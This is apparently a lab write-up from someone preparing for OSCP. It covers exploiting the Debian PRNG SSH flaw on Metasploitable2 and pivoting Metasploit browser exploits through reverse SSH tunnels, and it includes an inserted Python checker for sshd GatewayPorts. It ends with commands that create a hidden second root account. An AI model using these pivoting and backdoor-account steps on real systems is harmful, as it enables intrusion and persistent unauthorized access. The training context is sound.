Exploiting Metasploitable2 Debian PRNG Bruteforce SSH

After my OffSec PWK lab time ran out, I’m working on exploiting vulnerabilities without using Metasploit beyond use of exploit/multi/handler in preparation for the OSCP exam.

Port 22, SSH:
Debian OpenSSL – Predictable PRNG Bruteforce SSH Exploit https://www.exploit-db.com/exploits/5720/

Note: I had to run this exploit multiple times before it found the right key. I found a blog post that gave Metasploitable2’s root key, which worked. That key was in the key directory and it works to log in, but the exploit wasn’t finding it. After some searching I read a blog post about pwnos by g0tM1lk that says it sometimes fails to find the key.

After running this exploit for the third time it finally finds the key and prints the command to run to ssh to Metasploitable2 as root without a password.

How to use ssh pivoting with Metasploit exploits that require SRVHOST/SRVPORT and LHOST/LPORT

In my quest to get ssh pivoting working with Metasploit exploits, I found many examples of how to add routes and pivot through Metasploit. What I couldn’t find were examples on how to do this with exploits and payloads that require both SRVHOST/SRVPORT and LHOST/LPORT. An example of this is when the target only has port 3389 open, so you need a reverse payload to connect through your pivot host to you when hooking a browser.

When I used an established meterpreter session, backgrounded it, and entered “route add x.x.x.x x.x.x.x 1” to add a route, then ran an exploit using the meterpreter pivot host IP/port as LHOST/LPORT for the payload’s reverse connection, Metasploit would establish the LHOST/LPORT listener but would error out on the SRVHOST/SRVPORT listener when using the meterpreter pivot host IP address.

Example:
My pivot host that I have a meterpreter session on has IP address 10.1.1.1, my Kali vm has IP address 192.168.x.x, and I’m trying to lure victim 10.1.1.2 to my Metasploit browser exploit server. Host 10.1.1.2 doesn’t have a route to my Kali host, so a pivot is required.

In the exploit settings, if I used 10.1.1.1 for SRVHOST and LHOST, Metasploit would establish a server for the LHOST (reverse payload IP address) using the IP address of the meterpreter session host, but would throw errors for the SRVHOST IP address if it wasn’t on my local machine. (I’m running this on Kali 2.0 if it makes any difference.)

What ended up working for me:

On Kali and your pivot host, first make sure that you append GatewayPorts yes to /etc/ssh/sshd_config and restart the ssh service, to allow the listeners on 0.0.0.0 (listening on all IP addresses); otherwise it will bind to 127.0.0.1 and the port will be unreachable to the victim:

echo "GatewayPorts yes" >> /etc/ssh/sshd_config

When pivoting to another network and using any exploit that requires SRVHOST/SRVPORT and LHOST/LPORT, I setup two reverse ssh tunnels with:
ssh -R 10.x.x.xPivotHostIP:8000:KaliIPaddress:8001 username@pivothostIP
ssh -R 10.x.x.xPivotHostIP:9000:KaliIPaddress:9001 username@pivothostIP
… and set my SRVHOST/SRVPORT as KaliIPaddress/8001 and LHOST/LPORT as KaliIPaddress/9001.

I set the URIPATH to “/”, and lured the victim to http://10.x.x.xPivotHostIP:8000/, which would get tunneled through ssh to KaliIPaddress:8001.
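The GatewayPorts step above is the one that silently breaks this setup when it is done wrong, so here is an added example (my own checker, not a command from the original post) that predicts where the pivot host's sshd will actually bind an ssh -R listener from a copy of its sshd_config. It encodes two facts about sshd worth knowing before trusting an appended line: sshd uses the first occurrence of a keyword and ignores later ones, so "echo ... >> sshd_config" changes nothing if GatewayPorts was already set earlier in the file; and "GatewayPorts yes" forces the wildcard address while "no" forces loopback regardless of the bind address the client asked for, with "clientspecified" honouring the client. The same function doubles as an audit check, since any non-loopback answer means a port on the pivot is reachable from its network. The addresses, config fragments and forward specs are constructed for the demo; parsing stops at the first Match block and IPv6 bracket literals are not handled (both assumptions of this checker).

```python
"""Predict where an `ssh -R` listener ends up on the pivot host, given the
pivot's sshd_config. Added example for this post, not the author's tooling;
all configs and forward specs below are constructed so it runs offline."""
import re
from typing import Optional, Tuple

LOOPBACK = "127.0.0.1"   # sshd's default for remote forwards (GatewayPorts no)
WILDCARD = "0.0.0.0"


def effective_gateway_ports(sshd_config: str) -> str:
    """Return the GatewayPorts value sshd will actually use.

    sshd honours the FIRST occurrence of a keyword, so appending
    `GatewayPorts yes` to a file that already says `no` changes nothing.
    Only the global section is inspected: parsing stops at the first `Match`
    block, whose values are conditional (assumption of this checker).
    """
    for raw in sshd_config.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"[ \t=]+", line, maxsplit=1)  # "Key val" or "Key=val"
        keyword = parts[0].lower()
        if keyword == "match":
            break
        if keyword == "gatewayports" and len(parts) == 2:
            return parts[1].strip().strip('"').lower()
    return "no"  # sshd default when the keyword is absent


def parse_remote_forward(spec: str) -> Tuple[Optional[str], int, str, int]:
    """Split an `ssh -R [bind_address:]port:host:hostport` spec.

    Returns (bind_address, port, host, hostport); bind_address is None when
    omitted and '' when given as an empty field. IPv6 literals in brackets
    are not handled (assumption).
    """
    parts = spec.rsplit(":", 3)
    if len(parts) == 3:
        bind: Optional[str] = None
        port, host, hostport = parts
    elif len(parts) == 4:
        bind, port, host, hostport = parts
    else:
        raise ValueError(f"not a [bind_address:]port:host:hostport spec: {spec!r}")
    return bind, int(port), host, int(hostport)


def predicted_bind_address(spec: str, sshd_config: str) -> str:
    """Address the pivot's sshd will bind the -R listener to.

    GatewayPorts no  -> loopback, whatever the client asked for
    GatewayPorts yes -> wildcard, whatever the client asked for
    clientspecified  -> the client's bind_address ('' or '*' = wildcard,
                        omitted = loopback)
    """
    bind, _port, _host, _hostport = parse_remote_forward(spec)
    mode = effective_gateway_ports(sshd_config)
    if mode == "no":
        return LOOPBACK
    if mode == "yes":
        return WILDCARD
    if mode == "clientspecified":
        if bind is None:
            return LOOPBACK
        if bind in ("", "*"):
            return WILDCARD
        return bind
    raise ValueError(f"unrecognised GatewayPorts value: {mode!r}")


def forward_reachable_by_network(spec: str, sshd_config: str, pivot_ip: str) -> bool:
    """Defender's view of the same fact: True means an SSH client can expose a
    port on the pivot to its network, which is what an audit should flag."""
    addr = predicted_bind_address(spec, sshd_config)
    return addr == WILDCARD or addr == pivot_ip


if __name__ == "__main__":
    # Constructed configs; the second is the post's `echo ... >>` applied to a
    # file that already spelled out the default, which leaves it at 'no'.
    configs = {
        "keyword absent": "Port 22\n",
        "yes appended after no": "GatewayPorts no\nGatewayPorts yes\n",
        "yes": "GatewayPorts yes\n",
        "clientspecified": "GatewayPorts clientspecified\n",
    }
    spec = "10.1.1.1:8000:192.168.1.5:8001"   # constructed pivot and Kali addresses
    for name, cfg in configs.items():
        print(f"{name:24s} -> binds {predicted_bind_address(spec, cfg):9s} "
              f"reachable from the 10.1.1.0 side: "
              f"{forward_reachable_by_network(spec, cfg, '10.1.1.1')}")
```

Run it against a copy of the pivot's real sshd_config (for example by reading the file into the string) before restarting sshd; if the effective value comes back as "no" after appending, the earlier GatewayPorts line is the one that has to change.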

I wasn’t able to establish two ssh tunnels with the same username as the first session would disconnect when I established the second, so I created another user first. You can create a root user from a non-interactive session with:

useradd -ou 0 -g 0 username
echo "username:password" | chpasswd